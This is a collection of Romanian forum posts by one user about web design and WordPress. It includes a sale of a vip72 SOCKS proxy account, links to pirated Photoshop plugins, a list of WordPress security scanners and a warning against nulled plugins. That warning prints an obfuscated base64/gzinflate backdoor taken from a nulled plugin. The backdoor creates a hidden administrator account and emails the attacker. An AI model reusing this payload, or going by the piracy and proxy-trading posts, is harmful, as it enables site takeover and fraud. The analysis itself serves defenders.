Nest

Tu ai nevoie sa te avertizeze altii daca un fisier e infectat sau nu? Angajeaza pe cineva sa te avertizeze si sa nu uiti sa respiri. Idiot.

Vand cont pe vip72.com, expira pe 23 august si are socksuri nelimitate. 15$ BTC/PM/WMZ . Dau primul pentru utilizatorii de incredere.

Este cineva interesat de: Design Ammo Complete Edition WebZap UI Toolkit Round Icons PSD Shapes ONLY Pixel Snacks Pixel Dropr Le am si pe acestea, spuneti-mi daca va intereseaza si am sa imi fac timp sa le uploadez. Nu le-am pus inca pentru ca uploadez cu 100kb/s si dura foarte mult, dar am sa imi fac timp daca ii trebuie cuiva.

Daca stiti pluginuri interesante, de Photoshop, sau chiar si kituri UI, softuri, etc. lasati un link aici. Daca sunt interesante si am nevoie de ele, le cumpar si vi le dau si voua.

Am pus si linkul, am uitat de el.

Am cumparat recent cateva resurse (plug-ins) pentru Photoshop si vi le dau si voua. DevRocket JetPack CSSHat 1.2.0 PicJumbo 1.0.0 SubtlePatterns 1.2.1 PNGHat Enjoy & design! EDIT: https://www.sendspace.com/file/7sxq08 Am uitat .

Free download: Wikisend: free file sharing service M-am implicat intr-un proiect mai mare, nu mai am timp de newsletter. Cine doreste poate sa il codeze si foloseasca, chiar si sa il vanda.

Problema cu acea comanda este ca blocheaza si utilizatorul curent la versiunile sub 3.2.1 ; desi nu cred ca o mai foloseste cineva, e bine de stiut.

Pur si simplu cate un div pentru fiecare coloana (harta + text). Alignmentul il faci din CSS (harta in stanga, textul in dreapta), iar la text te folosesti de float. .harta { position: absolute; left: 0px; } Modifici cu left/right, si setezi pozitia fiecarui element.

Da, se pot gasi sub multe forme, deci iti recomand sa treci pe o tema gratuita. Nothing stays forever.

Spune-mi exact ce te intereseaza sa obtii (ce date) si ti-l fac eu daca am timp si pot. Sent from my UTOK 470 Q using Tapatalk

Cine i-a pus? Sent from my UTOK 470 Q using Tapatalk

Payza accepti? As cumpara 20$ daca e. Sent from my UTOK 470 Q using Tapatalk

Mersi . Aia cu citatul merge, la fel si cele 4 coloane fara text. Ai o bere de la mine.

Wemahu Daca ai fi citit cu putina atentie, ai vedea ca sunt mult mai multe moduri de a obfusca acele backdooruri, chestiile astea sunt, sa spunem, mid-level, care le-am prezentat in tutorial. Dar daca tu vrei sa mergi pe riscul tau, fa-o. O data ai sa te convingi ca nu ai avut.

Keep it up, buna mentalitate ai.

sitecheck.sucuri.net Acesta va scana websiteul pentru malware, injectii, spam si defaceuri. De asemenea colaboreaza cu motoarele anti-spam pentru a detecta daca site-ul este marcat ca si spam (in cazul in care cineva se foloseste de el pentru a trimite mailuri). De asemenea cei de la Sucuri ofera si un plugin de WordPress, care odata instalat ofera un firewall ce protejeaza impotriva vulnerabilitatilor cunoscute si o sectiune de "Last Logins" pentru a vedea cine s-a logat pe site. In plus, ofera si cateva utilitati post-hack, cum ar fi updatarea salturilor si resetarea parolelor tuturor utilizatorilor. Wordfence Security Acest plugin este destul de cunoscut. El scaneaza fisierele core, fiserele temelor si pluginurile impotriva unor vulnerabilitati cunoscute. De asemenea ofera un log unde se pot vedea toate actiunile ce au avut loc pe site. WP Changes Tracker / WP Security Audit Log Aceste doua pluginuri sunt exclusiv pentru vizualizarea logurilor, insa sunt cele mai avansate din aceasta categorie. Wemahu Acest plugin se ocupa exclusiv cu verificarea impotriva backdoorurilor ale pluginurilor si temelor, detectand webshelluri, cod PHP obfuscat, code execution si altele. Anti-Malware Pe langa scanarea impotriva backdoorurilor si vulnerabilitatilor, acesta ofera si un sistem anti-bruteforce pentru pagina wp-login.php Cam asta a fost. Desi sunt o multime de resurse care va pot ajuta sa scapati de malware, nu inseamna ca puteti folosi chestii nulled in voie, niciodata nu va exista un plugin sau software cu o rata de detectie de 100%. RSS

Finished product. Opinions?

Am sa scriu azi un tutorial despre scanarea WordPress pentru backdoors. Dupa cum am zis, daca nu ai o afacere sau macar un site din care sa poti scoate profit, nu ai nevoie de ceva platit. Alternative sunt peste tot, gratuite. Mai bine free dar sigur, decat nulled si sa te trezesti cu surprize. Sau iti construiesti, la fel ca si resursele free, tutoriale free exista chiar mai multe, pe langa faptul ca stii ce muncesti si iti faci cum vrei, mai si inveti ceva. Un incepator, pentru o tema de WordPress simpla, cam in 2 saptamani termina.

Degeaba dai scan numaii dupa base64, metode de obfuscare sunt multe. Cel mai bine e sa cumperi ce ai nevoie. Sent from my UTOK 470 Q using Tapatalk

Ah, n-am citit tot. Sent from my UTOK 470 Q using Tapatalk

Nu o sa arate nimic concret. Daca exista cineva atat de destept incat sa faca asta, atunci e si destul de destept ca sa se foloseasca de asa ceva. Sent from my UTOK 470 Q using Tapatalk

Vad in ultima perioada o multime de lume intreband de chestii nulled, pentru ca totul e roz bombon cand vine vorba de Internet, stim cu totii. Am sa va arat cateva exemple sa vedeti ce va ofera pluginurile/temele/scripturile nulled, fata de versiunile oficiale: SEOPressor - Pret original: 47$ + Chestia asta e chiar de pe un site romanesc. Pluginul era instalat in directorul wp-content/plugins/seo-pressor(gratuit). Deja cuvantul "gratuit" forma o idee generala despre continutul directorului. Folosind un plugin de scan, s-a gasit urmatorul cod in site (seo-pressor(gratuit)/classes/central.class.php): eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/ iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/ 5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) ); Dupa decriptare: Deci, exista doua functii introduse in "wp_head" => sunt executate la fiecare incarcare de pagina. Prima functie, my_wpfunww7x(), creeaza un utilizator "wordpress" cu parola "gh67io9Cjm" cu permisiuni de administrator. Asta se intampla numai in cazul in care URLul paginii are parametrul "cms" de tip GET cu valoarea "jjoplmh". Ex: Success | .xyz Domain Names | Join Generation XYZ A doua, my_wpfunww7c8(), verifica daca exista utilizatorul. Daca nu, trimite un e-mail catre adresa "thomasasza@gmx.com", cu URLul blogului in subiect si "WordPress Plugin" in continut. Logica e simpla: Cand pluginul e instalat, imediat se trimite un e-mail la adresa celui care a introdus backdoorul (thomasasza@gmx.com) Acesta intra pe blog, si acceseaza ?cms=jjoplmh in URL. Prin accesarea acelui URL, se creeaza utilizatorul cu permisiuni de administrator. Acum el se poate loga pe blog ca si cand al lui si are acces la tot, ceea ce poate duce la lucruri mai grave, cum ar fi compromiterea intregului server. SEOPressor - Pret original: 42$ + Backdoorul se afla in fisierul: wp-content/restrict-content-pro/includes/sidebar.php - #8966576 - Pastie - daca va uitati atent, aproape tot codul este comentat, mai putin urmatoarea chestie: Arata similar, nu? Singura diferenta dintre pluginul precedent este o functie numita diferit (my_wpfunww458, si adresa de e-mail, care decodata devine wordpresssslog@yandex.com Codul de sus se ocupa de partea de trimitere a e-mailului. Cel care creeaza utilizatorul cu drepturi de administrator se afla in fisierul wp-content/restrict-content-pro/includes/class.php - #8966599 - Pastie - aceeasi strategie, aproape tot codul comentat, mai putin: de data asta, folosindu-se de parametrul ?cms=go Si, in ultimul rand, modificarea fisierului wp-content/restrict-content-pro/restrict-content-pro.php pentru a executa cele doua comenzi: wp-content/restrict-content-pro/restrict-content-pro.php Si cam atat, ca e aproape 1 noaptea si deja mi-e somn. Nu luati chestii nulled, daca nu aveti buget inseamna ca nu aveti neaparata nevoie de ele si o alternativa gratuita este ceea ce va trebuie. www.sucuri.net @pr0fw3b think about it.

Pai, oricum tot acolo se ajunge. Din postul lui initial reiese ca vrea ceva gratuit, deci, oricum le-ar fi gasit. Informatia e publica si raspandita destul incat nu are rost sa incerci sa o combati. Am avut si eu logouri si altele care au ajuns publice pe net dupa ce le-am vandut, si stiu senzatia. Poate, totusi, daca face asa si dupa ceva timp scoate bani din afacere, o sa o cumpere, realizand singur ca nu se compara versiunea nulled cu cea oficiala. Mai ales dupa ce o sa ii fie introdus un backdoor in site de "binevoitorul" care a uploadat acea versiune.

Go with WooThemes. Le gasesti si nulled daca nu vrei sa platesti, au si plugin de eCommerce.